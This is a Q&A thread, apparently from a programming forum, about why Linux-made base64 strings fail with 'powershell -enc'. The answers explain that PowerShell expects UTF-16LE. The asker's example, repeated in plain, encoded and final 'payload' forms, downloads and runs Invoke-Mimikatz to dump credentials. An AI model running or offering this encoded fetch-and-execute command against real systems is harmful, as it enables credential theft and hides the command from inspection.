# Powershell base64 encoding required

Tags: bash, powershell, base64

I want to execute base64 encoded commands in powershell. For example, I took a command from this github repo: https://gist.github.com/gfoss/ca6aa37f97fd400ff14f. Running the mimikatz one:

```
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
```

If I run it straight in a powershell prompt, it works correctly. Checking the base64 encoded version, I see that it also works correctly:

```
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
```

However, Im not sure how that string was encoded. If I try to encode it in Linux, I get a different string (I just changed the quotes to prevent bash interpretating the $):

```
echo -e 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/Powe
rSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m' | openssl enc -base64 -A

SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vUG93ZXJTaGVsbE1hZmlhL1Bvd2VyU3Bsb2l0L21hc3Rlci9FeGZpbHRyYXRpb24vSW52b2tlLU1pbWlrYXR6LnBzMSIpOyAkbSA9IEludm9rZS1NaW1pa2F0eiAtRHVtcENyZWRzOyAkbQo=
```

This encoding fails when I try to run it with powershell -enc.

What encoding should I use to make the string completely compatible with powershell?

Answer (score 6, accepted):

PowerShell expects the base64 string to be `Unicode` encoded - and `Unicode` is Windows-lingo for little-endian UTF-16.

You can use `iconv` to convert to `UTF-16LE` if you need to encode a PowerShell command from a linux shell without access to .NET:

```
iconv -f ASCII -t UTF-16LE filename.txt |base64 -w 0
```

Comment: Indeed (+1); to adapt this to providing the string via stdin: `printf %s '...' | iconv -t UTF-16LE | base64 -w 0`.

Comment: `iconv -f ASCII -t UTF-16LE <(echo "Write-Host 'wassup!'") |base64 -w 0` if you just want to drop a string in there at the cli

Comment: Yes, but there's no advantage to using a process substitution over the pipeline here Also, avoid `echo` to prevent problems with behavior variations across shells and strings that start with `-`. Last not least: `echo` appends a trailing newline, which doesn't matter here, but may in other contexts.

Comment: P.S.: If an extra trailing newline is not a concern, the simplest solution in `bash`, `ksh`, and `zsh` (but not POSIX-features-only shells such as `dash`) is to use a [_here-string_](https://tiswww.case.edu/php/chet/bash/bashref.html#Here-Strings): `iconv -f ASCII -t UTF-16LE <<<"Write-Host 'wassup!'"`

Comment: Thanks, this is awesome. I had to use double quotes inside the powershell command and wrap everything in single quotes to prevent the special chars being interpreted by bash (eg $). The final command used to generate the payload was:

 iconv -f ASCII -t UTF-16LE <<<'IEX (New-Object Net.WebClient).DownloadString("
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCr
eds; $m' | base64 -w 0

Comment: @user134167 Cool! Might also be able to escape `"` by doubling it, ie. `<<<"iex ""Command Goes here"""`

Answer (score 3):

use one from the powershell examples?

```
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("command_goes_here"))
```

Comment: But I need to encode it from a Linux box, not natively. I'm guessing it has something to do with the encoding.

Comment: Besides, I just tried it and it didin't work that way either. (The code is too long to post it in a reply, but it fails with  

The term '=' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:154"
)

Comment: $ echo -n "your text" | iconv -f UTF8 -t UTF16LE  | base64